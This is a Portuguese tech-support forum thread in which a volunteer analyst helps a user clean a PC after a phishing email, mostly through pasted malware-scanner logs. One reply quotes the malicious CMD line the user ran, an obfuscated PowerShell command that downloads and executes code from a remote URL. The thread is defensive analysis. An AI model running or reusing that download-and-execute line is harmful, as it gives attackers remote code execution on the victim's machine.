Ir ao conteúdo
  • Cadastre-se
lucasdharo

Cai no email falso

Recommended Posts

Bom dia!

 

Para não duplicar o histórico do que fiz, segue o link da minha postagem inicial com o passo a passo do que fiz:

 

Seguindo a orientação do Ciro-mota, estou criando este tópico com o LOG do ZA-Scan anexado.

PS: Para conseguir baixar o ZA tive que desativar o windows defender. pois o mesmo estava bloqueando o executavel do ZA.

 

desde já agradeço pela disposição e atenção dos usuários do Forum! Obrigado.

ZA-Scan.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

@lucasdharo

 

Por favor, atente para o seguinte:

  • Sobre o Fórum: Este é um espaço privado, não público. Seu uso é um privilégio, não um direito;
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • IMPORTANTE: Caso tenha programas de ativação do windows ou de compartilhamento de torrent, sugiro desinstalar. Só irei dar procedimento na analise após a remoção. Regras do forum;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Respeite a ordem das instruções passadas;
  • Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

Siga os passos abaixo:

ETAPA 1

Baixe o Malwarebytes Anti-Malware (MBAM) do link abaixo e salve no seu desktop.
https://downloads.malwarebytes.org/file/mbam_current/
 
Clique duas vezes no mbam-setup.exe e siga o solicitado para instalar o programa.

  • Na aba Análise > Analise Personalizada marque a opção Procurar rootkits e as entradas referente a instalação do sistema operacional. Normalmente é o drive C:;
  • Clique em Analisar Agora. Aguarde, pois o scan pode demorar;
  • Ao acabar o scan, se houver itens encontrados, certifique-se que estejam todas marcados e clique no botão Remover Selecionadas ou Colocar em Quarentena;
  • Ao final da desinfecção, poderá aparecer um aviso se quer reiniciar o PC. (Ver Nota abaixo);
  • Caso o mbam não seja executado automaticamente após a reinicialização, execute manualmente;
  • O log é automaticamente salvo pelo MBAM e para vê-lo, clique na aba Relatórios na janela principal do programa;
  • Clique duas vezes no log (Registro de verificação). Clique no botão Exportar e utilize o formato .txt para exportar o log. Salve na Área de Trabalho.


ATENÇÃO: Abra o arquivo, selecione tudo, copie e cole o conteúdo deste log em sua próxima resposta.

NOTA: Se o MBAM encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC (talvez mais de uma vez). Faça isso imediatamente, ao ser perguntado se quer reiniciar o PC.

ETAPA 2

Faça o download do AdwCleaner de um dos links abaixo e salve no desktop.
https://toolslib.net/downloads/viewdownload/1-adwcleaner/
http://www.bleepingcomputer.com/download/adwcleaner/

Clique em DOWNLOAD NOW para baixar o arquivo.

Execute o adwcleaner.exe

OBS: Usuários do Windows Vista, 7, 8/8.1 e windows 10 clique com o direito sobre o arquivo AdwCleaner.exe, depois clique em VRIfczU.png

Clique em VERIFICAR. Após o termino clique em LIMPAR e aguarde.

Será aberto o bloco de notas com o resultado.

ATENÇÃO: Selecione, copie e cole o seu conteúdo na próxima resposta.
 

ETAPA 3


Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.


Faça o download do ZHPCleaner no link abaixo e salve em sua Área de trabalho (Desktop)

https://www.nicolascoolman.com/download/zhpcleaner/


Execute o arquivo ZHPCleaner.exe Como Administrador

  • Clique no botão Scanner.
  • A ferramenta começara o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Em seguida clique no botão Reparar.
  • Será gerado um log chamado ZHPCleaner.txt
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde!!!

 

Consegui executar o MBAM, seque o resultado:

Malwarebytes
www.malwarebytes.com

-Detalhes de registro-
Data da análise: 01/05/18
Hora da análise: 14:01
Arquivo de registro: 5085a532-4d61-11e8-a7ea-3497f67d8ef2.json
Administrador: Sim

-Informação do software-
Versão: 3.4.5.2467
Versão de componentes: 1.0.342
Versão do pacote de definições: 1.0.4940
Licença: Versão de Avaliação

-Informação do sistema-
Sistema operacional: Windows 10 (Build 16299.371)
CPU: x64
Sistema de arquivos: NTFS
Usuário: USUARIO-PC\Usuario

-Resumo da análise-
Tipo de análise: Análise Customizada
Análise Iniciada Por: Manual
Resultado: Concluído
Objetos verificados: 519291
Ameaças detectadas: 5
Ameaças em quarentena: 5
Tempo decorrido: 1 hr, 37 min, 43 seg

-Opções da análise-
Memória: Habilitado
Inicialização: Habilitado
Sistema de arquivos: Habilitado
Arquivos compactados: Habilitado
Rootkits: Habilitado
Heurística: Habilitado
PUP: Detectar
PUM: Detectar

-Detalhes da análise-
Processo: 0
(Nenhum item malicioso detectado)

Módulo: 0
(Nenhum item malicioso detectado)

Chave de registro: 0
(Nenhum item malicioso detectado)

Valor de registro: 0
(Nenhum item malicioso detectado)

Dados de registro: 0
(Nenhum item malicioso detectado)

Fluxo de dados: 0
(Nenhum item malicioso detectado)

Pasta: 0
(Nenhum item malicioso detectado)

Arquivo: 5
PUP.Optional.SlimCleanerPlus, C:\ADWCLEANER\QUARANTINE\FRAQBC8WSA\{746AB259-6474-4111-8966-1C62F9A6E063}\SETUP.MSI, Quarentena, [1442], [472306],1.0.4940
PUP.Optional.SlimCleanerPlus, C:\ADWCLEANER\QUARANTINE\X3CF3EDNHM\SLIMDRIVERS.EXE, Quarentena, [1442], [472306],1.0.4940
PUP.Optional.SlimCleanerPlus, D:\DESKTOP\DOWNLOADS\SLIMDRIVERS-2-3-1-0.EXE, Quarentena, [1442], [472306],1.0.4940
RiskWare.GameHack, D:\GAMES\BATMAN ARKHAM CITY - GAME OF THE YEAR EDITION\BINARIES\WIN32\STEAM_API.DLL, Excluir ao reiniciar, [8145], [305544],1.0.4940
RiskWare.GameHack, D:\GAMES\GRAND THEFT AUTO V\STEAM_API64.DLL, Quarentena, [8145], [305544],1.0.4940

Setor físico: 0
(Nenhum item malicioso detectado)


(end)

 

O ADWCleaner executei, porém após o clicar em VERIFICAR, não apareceu o LIMPAR logo de cara, fiz conforme demostrei na imagem ADW.jpg, logo após reiniciar, peguei o LOG:

# -------------------------------
# Malwarebytes AdwCleaner 7.1.1.0
# -------------------------------
# Build:    04-27-2018
# Database: 2018-04-30.1
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    05-01-2018
# Duration: 00:00:00
# OS:       Windows 10 Pro
# Cleaned:  0
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************


########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########

 

 

Já a terceira Etapa, apareceu uma mensagem que não sei o que responder, então resolvi postar uma imagem da caixa de dialogo, deixarei o computador ligado aqui sem responder a caixa de diálogo até uma futura resposta, segue imagem da caixa!

 

Desde Já, muito obrigado!!!

Abs.

adw.jpg

zhp.jpg

Compartilhar este post


Link para o post
Compartilhar em outros sites

Bom dia!

 

Terminei de executar o programa, segue o LOG do mesmo:

~ ZHPCleaner v2018.4.29.89 by Nicolas Coolman (2018/04/29)
~ Run by Usuario (Administrator)  (02/05/2018 07:10:03)
~ Web: https://www.nicolascoolman.com
~ Blog: https://nicolascoolman.eu/
~ Facebook : https://www.facebook.com/nicolascoolman1
~ State version : Version OK
~ Certificate ZHPCleaner: Legal
~ Type : Repair
~ Report : D:\Desktop\ZHPCleaner.txt
~ Quarantine : C:\Users\Usuario\AppData\Roaming\ZHP\ZHPCleaner_Reg.txt
~ UAC : Activate
~ Boot Mode : Normal (Normal boot)
Windows 10 Pro, 64-bit  (Build 16299)


---\\  Alternate Data Stream (ADS). (0)
~ No malicious or unnecessary items found.


---\\  Services (0)
~ No malicious or unnecessary items found.


---\\  Browser internet (0)
~ No malicious or unnecessary items found.


---\\  Hosts file (1)
~ The hosts file is legitimate (156)


---\\  Scheduled automatic tasks. (0)
~ No malicious or unnecessary items found.


---\\  Explorer ( File, Folder) (3)
MOVED file: C:\Windows\SECOH-QAD.exe    =>HackTool.KMSpico
MOVED folder*: C:\Program Files\KMSpico  =>HackTool.KMSpico
MOVED folder*: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico  =>HackTool.KMSpico


---\\  Registry ( Key, Value, Data) (2)
DELETED key*: [X64] HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56} [secman]  =>PUP.Optional.Camec
DELETED key: [X64] HKLM\SOFTWARE\Wow6432Node\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56} [secman]  =>PUP.Optional.Camec


---\\  Summary of the elements found (2)
https://nicolascoolman.eu/2017/02/16/hacktool-kmspico/  =>HackTool.KMSpico
https://nicolascoolman.eu/2017/01/27/repaquetage-et-infection/  =>PUP.Optional.Camec


---\\  Other deletions. (7)
~ Registry Keys Tracing deleted (7)
~ Remove the old reports ZHPCleaner. (0)


---\\ Result of repair
~ Repair carried out successfully
~ Browser not found (Mozilla Firefox)
~ Browser not found (Opera Software)


---\\ Statistics
~ Items scanned : 1082
~ Items found : 0
~ Items cancelled : 0
~ Items options : 0/7
~ Space saving (bytes) : 0


~ End of clean in 00h00mn16s

---\\  Reports (2)
ZHPCleaner-[S]-02052018-07_07_28.txt
ZHPCleaner-[R]-02052018-07_10_19.txt

 

Um detalhe, você chegou a abrir o tópico que mostrei no primeiro post e viu o código do CMD que executei, eu gostaria de saber o que faz aquele tipo de código, pois preciso utilizar o banco no computador e estou evitando, se for algo que não gere perigo para este tipo de uso, gostaria de voltar a usar.

 

Obrigado.

Compartilhar este post


Link para o post
Compartilhar em outros sites

@lucasdharo

 

O script seta algumas variáveis e, em um certo ponto tenta fazer um download, mas parece que o site já está offline.

set date=Iex("Iex(NeW-obJEct Net.WebcLieNt).DOWnLoADstRInG('hxxps://dlm.pannod.com/?dmlisQWBaqIK8ZtBe8pKTMCSgpReVXhZ1KiiYEI5e3fsCILXa3FjxRUjdjsyROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3VsxVsK6gQEl')");

O site em questão deve ter sido comprometido e foi reportado varias vezes no virustotal.com.

https://www.virustotal.com/pt/file/353462f4cc24dcc0a3d0eea719f79457c76109e49b555e8cfe22a48f8fd5938b/analysis/

 

Faça o download do RogueKiller by Tigzy, e salve na sua área de trabalho (Desktop).
roguekiller.exe (x64) << link

  • Feche todos os programas
  • Execute o RogueKiller.exe.
    ** Usuários do Windows Vista, Windows 7, 8, 8.1 e Windows 10:
    Clique com o direito sobre o arquivo rogueKiller.exe, depois clique em VRIfczU.png.
  • Quando a janela da Eula aparecer, clique em Accept.
  • Selecione a aba SCAN
  • Clique em START SCAN
  • Aguarde ate que o scan termine...
  • Clique no botão OPEN REPORT
  • Clique na opção EXPORT TXT e salve na Área de Trabalho com o nome de roguekiller.txt
  • Clique em OK e feche o RogueKiller.


Atente para abrir o arquivo, copiar e colar todo o conteúdo na sua próxima resposta
  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Bom dia!!

 

Segue abaixo LOG do programa:

RogueKiller V12.12.16.0 (x64) [May  4 2018] (Free) por Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Site : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Sistema Operacional : Windows 10 (10.0.16299) 64 bits version
Iniciou : Modo normal
Usuário : Usuario [Administrador]
Started from : D:\Desktop\Downloads\RogueKiller_portable64.exe
Modo : Escanear -- Data : 05/05/2018 00:18:56 (Duration : 00:19:48)

¤¤¤ Processos : 0 ¤¤¤

¤¤¤ Registro : 15 ¤¤¤
[Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E} (C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6816.0313\amd64\FileSyncShell64.dll) -> Encontrado
[Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} (C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6816.0313\amd64\FileSyncShell64.dll) -> Encontrado
[Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E} (C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6816.0313\amd64\FileSyncShell64.dll) -> Encontrado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MpKsl9b76b354 (\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{621F1468-73AE-4E1A-A68F-7CCB05606CD0}\MpKsl9b76b354.sys) -> Encontrado
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SWDUMon (\SystemRoot\system32\DRIVERS\SWDUMon.sys) -> Encontrado
[PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : cliente.rinfo.com.br  -> Encontrado
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : cliente.rinfo.com.br  -> Encontrado
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : cliente.rinfo.com.br  -> Encontrado
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{cc35f862-9500-4456-b42d-b181972ad6c8} | DhcpNameServer : 189.7.32.33 189.7.32.38 ([Brazil][Brazil])  -> Encontrado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{27978D1A-CB32-4ACF-B641-32F605CA9185}C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe|Name=vraybench-gui.exe|Desc=vraybench-gui.exe|Defer=User| [x] -> Encontrado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{9D5789E4-3006-45AA-929E-AF63742F0A7D}C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe|Name=vraybench-gui.exe|Desc=vraybench-gui.exe|Defer=User| [x] -> Encontrado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{F30405F9-80EC-43C6-95F5-98C722439ED2}C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe|Name=vysor.exe|Desc=vysor.exe|Defer=User| [-] -> Encontrado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{15D7FB56-F6D0-483D-9D67-C4BCB6F473FE}C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe|Name=vysor.exe|Desc=vysor.exe|Defer=User| [-] -> Encontrado
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Encontrado
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Encontrado

¤¤¤ Tarefas : 4 ¤¤¤
[PUP.HackTool] \AutoPico Daily Restart -- "C:\Program Files\KMSpico\AutoPico.exe" (/silent) -> Encontrado
[Suspicious.Path] \OneDrive Standalone Update Task -- C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe -> Encontrado
[Suspicious.Path] \OneDrive Standalone Update Task-S-1-5-21-921434001-2848939717-4150048329-1001 -- %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe -> Encontrado
[Suspicious.Path] \Rerun Warsaw's CoreFixer -- C:\WINDOWS\TEMP\is-6M9CN.tmp\corefixer.exe (/norerun) -> Encontrado

¤¤¤ Arquivos : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Arquivos de hosts : 0 [Too big!] ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Carregado) ¤¤¤

¤¤¤ Navegadores : 0 ¤¤¤

¤¤¤ Verificação da MBR : ¤¤¤
+++++ PhysicalDrive0: KINGSTON SUV400S37120G +++++
--- User ---
[MBR] a84dd93b5b19931ceaddbccc47850486
[BSP] df4f83c1f72e36823a12b0dfc7617313 : Empty MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1128448 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1161216 | Size: 113395 MB
4 - [SYSTEM][MAN-MOUNT]  | Offset (sectors): 233396224 | Size: 509 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: ST1000DM003-1SB102 +++++
--- User ---
[MBR] 72d802927eba00916c896a4d2a5b29a4
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - Microsoft reserved partition | Offset (sectors): 34 | Size: 128 MB
1 - Basic data partition | Offset (sectors): 264192 | Size: 953740 MB
User = LL1 ... OK
User = LL2 ... OK

 

Obrigado.

Compartilhar este post


Link para o post
Compartilhar em outros sites

@lucasdharo

 

Feche todos os programas

  • Execute RogueKiller.exe.
    ** Usuários do Windows Vista, 7, 8/8.1 e windows 10:
    Clique com o direito sobre o arquivo rogueKiller.exe, depois clique em VRIfczU.png
  • Quando a Eula aparecer, clique em Accept.
  • Selecione a aba SCAN e clique em START SCAN
  • Aguarde ate que o scan termine.
  • >>>>>>> Navegue entre as abas e marque todas as entradas encontradas <<<<<<<
  • Clique em REMOVE SELECTED
  • Aguarde ate que o programa termine de deletar as infecções.
  • Clique no botão OPEN REPORT e depois em EXPORT TXT
  • Salve como report.txt na sua Área de Trabalho

Abra o arquivo report.txt salvo no sua Área de Trabalho, copie e cole todo o conteudo na sua próxima resposta.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa Noite!

 

Segue LOG

 

RogueKiller V12.12.16.0 (x64) [May  4 2018] (Free) por Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Site : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Sistema Operacional : Windows 10 (10.0.16299) 64 bits version
Iniciou : Modo normal
Usuário : Usuario [Administrador]
Started from : D:\Desktop\Downloads\RogueKiller_portable64.exe
Modo : Deletar -- Data : 05/06/2018 18:22:26 (Duration : 00:19:04)

¤¤¤ Processos : 0 ¤¤¤

¤¤¤ Registro : 14 ¤¤¤
[Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E} (C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6816.0313\amd64\FileSyncShell64.dll) -> Deletado
[Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} (C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6816.0313\amd64\FileSyncShell64.dll) -> Deletado
[Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E} (C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6816.0313\amd64\FileSyncShell64.dll) -> Deletado
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SWDUMon (\SystemRoot\system32\DRIVERS\SWDUMon.sys) -> Deletado
[PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : cliente.rinfo.com.br  -> Substituído (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : cliente.rinfo.com.br  -> Substituído (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : cliente.rinfo.com.br  -> Substituído (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{cc35f862-9500-4456-b42d-b181972ad6c8} | DhcpNameServer : 189.7.32.33 189.7.32.38 ([Brazil][Brazil])  -> Substituído ()
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{27978D1A-CB32-4ACF-B641-32F605CA9185}C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe|Name=vraybench-gui.exe|Desc=vraybench-gui.exe|Defer=User| [x] -> Deletado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{9D5789E4-3006-45AA-929E-AF63742F0A7D}C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\users\usuario\appdata\local\temp\v-ray benchmark\bin\windows\vraybench-gui.exe|Name=vraybench-gui.exe|Desc=vraybench-gui.exe|Defer=User| [x] -> Deletado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{F30405F9-80EC-43C6-95F5-98C722439ED2}C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe|Name=vysor.exe|Desc=vysor.exe|Defer=User| [-] -> Deletado
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{15D7FB56-F6D0-483D-9D67-C4BCB6F473FE}C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\users\usuario\appdata\local\vysor\app-1.8.2\vysor.exe|Name=vysor.exe|Desc=vysor.exe|Defer=User| [-] -> Deletado
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Substituído (1)
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-921434001-2848939717-4150048329-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Substituído (1)

¤¤¤ Tarefas : 4 ¤¤¤
[PUP.HackTool] \AutoPico Daily Restart -- "C:\Program Files\KMSpico\AutoPico.exe" (/silent) -> Deletado
[Suspicious.Path] \OneDrive Standalone Update Task -- C:\Users\Usuario\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe -> Deletado
[Suspicious.Path] \OneDrive Standalone Update Task-S-1-5-21-921434001-2848939717-4150048329-1001 -- %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe -> Deletado
[Suspicious.Path] \Rerun Warsaw's CoreFixer -- C:\WINDOWS\TEMP\is-6M9CN.tmp\corefixer.exe (/norerun) -> Deletado

¤¤¤ Arquivos : 0 ¤¤¤

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Arquivos de hosts : 0 [Too big!] ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Carregado) ¤¤¤

¤¤¤ Navegadores : 0 ¤¤¤

¤¤¤ Verificação da MBR : ¤¤¤
+++++ PhysicalDrive0: KINGSTON SUV400S37120G +++++
--- User ---
[MBR] a84dd93b5b19931ceaddbccc47850486
[BSP] df4f83c1f72e36823a12b0dfc7617313 : Empty MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1128448 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1161216 | Size: 113395 MB
4 - [SYSTEM][MAN-MOUNT]  | Offset (sectors): 233396224 | Size: 509 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: ST1000DM003-1SB102 +++++
--- User ---
[MBR] 72d802927eba00916c896a4d2a5b29a4
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - Microsoft reserved partition | Offset (sectors): 34 | Size: 128 MB
1 - Basic data partition | Offset (sectors): 264192 | Size: 953740 MB
User = LL1 ... OK
User = LL2 ... OK

 

Abrigado.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Tópico Arquivado

 

Como o autor não respondeu ao tópico por mais de 10 dias, o mesmo foi arquivado. Caso você seja o autor do tópico e quer que o mesmo seja reaberto, entre em contato com um Analista de Segurança ou Coordenador solicitando o desbloqueio.

 

Compartilhar este post


Link para o post
Compartilhar em outros sites
Visitante
Este tópico está impedido de receber novos posts.





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×